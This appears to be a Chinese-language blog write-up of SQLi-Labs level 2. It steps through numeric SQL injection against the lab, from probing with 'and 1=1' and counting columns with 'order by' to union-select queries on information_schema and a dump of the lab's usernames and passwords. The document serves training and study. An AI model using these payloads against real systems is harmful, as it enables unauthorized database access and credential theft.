首页 > 数据库 >SqliLabs 第二关 ,数字型注入!!!

SqliLabs 第二关 ,数字型注入!!!

时间:2023-05-09 20:33:27浏览次数:39  
标签:username group SqliLabs 数字型 查询 表名 password id 注入

首先打开网页,进行注入点的测试 输入?id=1 and 1=1发现1=2的时候出现了报错,说明服务器接收了我们的指令,并且进行了反馈,说明了有注入点的存在,然后对注入点进行测试

截图.png

然后输入order by()来拆解一下有多少个显示字段,输入4发现没有回显,

截图.png

输入order by 3发现有回显并且有三个显示字段,

截图.png

然后输入union select 1,2,3 因为有三个显示字段,所以查询一下显示位,因为我们要显示我们输入的1,2,3.所以要把服务器想要显示的让他报错,发现只有2和3,有回显

截图.png

知道2和3可以回显之后就可以进行下一步,在2或者3的位置进行信息收集,首先进行他的数据库版本和数据库名字进行收集得到

数据库版本:version() 5.7.26

数据库名称:database() security

截图.png

因为得到了他的数据库的名字,所以我们要去收集他的表名

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'

截图.png

查询到表名有 emails,referers,uagents,users

截图.png

查询完表名之后就要去查询他的列名,一共有四个表名,所以我们就要去挨个查询,去得到他的敏感信息,因为要查询列名,所以就要把查询的表名切换为列名,然后来自于表名下所有的列,,这些来自于表名所以后面有要改搜索到的表名,一共有四个表名,就要去挨个去搜索,

union select 1,group_concat(column_name),3 from information_schema.columns where table_name='emails' 蓝色字体为修改的值

得到的列名总共有 id,email_id id,referer,ip_address id,uagent,ip_address,username

USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,level,id,username,password

截图.png

发现里面有,username,password意思是账号密码的意思,可以在这两个列里面查询里面的信息,因为不知道有多少密码可以尝试用group_concat()来全部输出看一下

union select 1,group_concat(username),group_concat(password) from users

联合查询,全部输出(username),全部输出(password) 来自于users

因为username,password是在users 这个表里面查询出来的,就要去这个表里面去查询

截图.png

得到账号Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4,admin5

密码Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4,admin5

标签:username,group,SqliLabs,数字型,查询,表名,password,id,注入
From: https://www.cnblogs.com/wahaha1/p/17386180.html

相关文章

  • 原来Spring能注入集合和Map的computeIfAbsent是这么好用!
    大家好,我是3y,今天继续来聊我的开源项目austin啊,但实际内容更新不多。这文章主是想吹下水,主要聊聊我在更新项目中学到的小技巧。今天所说的小技巧可能有很多人都会,但肯定也会有跟我一样之前没用过的。消息推送平台......
  • 5.8之常见网络攻击及防御方法总结(XSS、SQL注入、CSRF攻击)
    目录背景知识XSS攻击SQL注入CSRF攻击背景知识从互联网诞生之初起,无时无刻不存在网络攻击,其中XSS攻击和SQL注入攻击是网站应用攻击的最主要的两种手段,全球大约70%的网站应用攻击都来自XSS攻击和SQL注入攻击。此外,常用的网站应用攻击还包括CSRF、Session劫持等。XSS攻击全......
  • DI依赖注入环境
    我还是在跟着狂神来学习Spring51.构造器注入2.Set方式注入【重点】3.扩展方式注入我在这里记录一下set依赖注入的步骤吧Set方式注入:分为依赖:bean对象的创建依赖于容器注入:bean对象中的所有属性,由容器来注入先放一下目录结构吧第一步:配置好实体类首先写了一些不同......
  • Nullbyte - SQL注入大赏
    主机发现sudonmap-sT--min-rate10000-p-xx.xx.xx.xx-oAnmapscan/portssudonmap-sT-sC-sV-O-pxx.xx.xx.xx-oAnmapscan/detailsudonmap-sU--top-ports20xx.xx.xx.xx-oAnmapscan/udpsudonmap-sU-pxx.xx.xx.xx sudonmap--script=vuln-pxx.xx......
  • WPF注入service,将service作为viewModel参数时,无法进入Model的问题。
    WPF注入service,将service作为viewModel参数时,无法进入Model的问题。一开始以为是注入失败,或者注入的service不对。经过排查,发现是viewModel中的参数service,不是当前包的service,是api通用包中的。....更改之后就可以进入Model了。......
  • sqlilabs第一关
    首先打开网页,进行注入点的测试输入?id=1and1=1发现1=2的时候没有进行报错,有两种可能,一种是不能注入,第二种是字符型可以通过对字符型里面的''进行闭合,输入'and1=1--+发现在1=2的情况下出现了报错,说明还是可以进行注入的, 然后输入'orderby()--+来拆解一下有多少个显示字段,......
  • 一种通过注入机制获取资源的方法
    目的:从地图网站上获取瓦片文件,但直接访问图片地址显示被禁止。需要绕开这个禁止。方法:通过在页面脚本中进行注入,在加载资源的时候,直接将资源下载到本地下载文件夹中关键:1、注入方法,将原事件函数指向新变量,用自己的函数替代,并执行原函数以保证程序正常运行;2、新变量仍在原对象......
  • sql注入原理和mybatis解决sql注入
    转载:https://www.bilibili.com/video/BV1ZR4y1Y745/?spm_id_from=333.880.my_history.page.click&vd_source=46d50b5d646b50dcb2a208d3946b1598https://juejin.cn/post/7064740474057146398#heading-11......
  • OrchardCore 中的 插件开发/ Shape / DisplayDriver / 视图扩展 / Razor代码注入
    请注意该文章仅限于OrchardCore项目中的DisplayDriver扩展机制,ASP.NETCOREMVC自身并没有对应功能,如果需要可以将相关的OrchardCore模块添加到项目中也可以实现响应功能背景最近一个功能需求,需要使用其它用户模拟身份,所以计划在用户列表页面扩展按钮组功能那么开始看代......
  • 字符型注入(get)
    在查询栏输入1,点击查询获得查询格式?name=1'&submit=查询*捷径'or1=1--+*非捷径?name=1'and1=2--+2--+&submit=查询用不了,直接查?name=1'orderby2--+&submit=查询?name=1'unionselect1,2--+&submit=查询......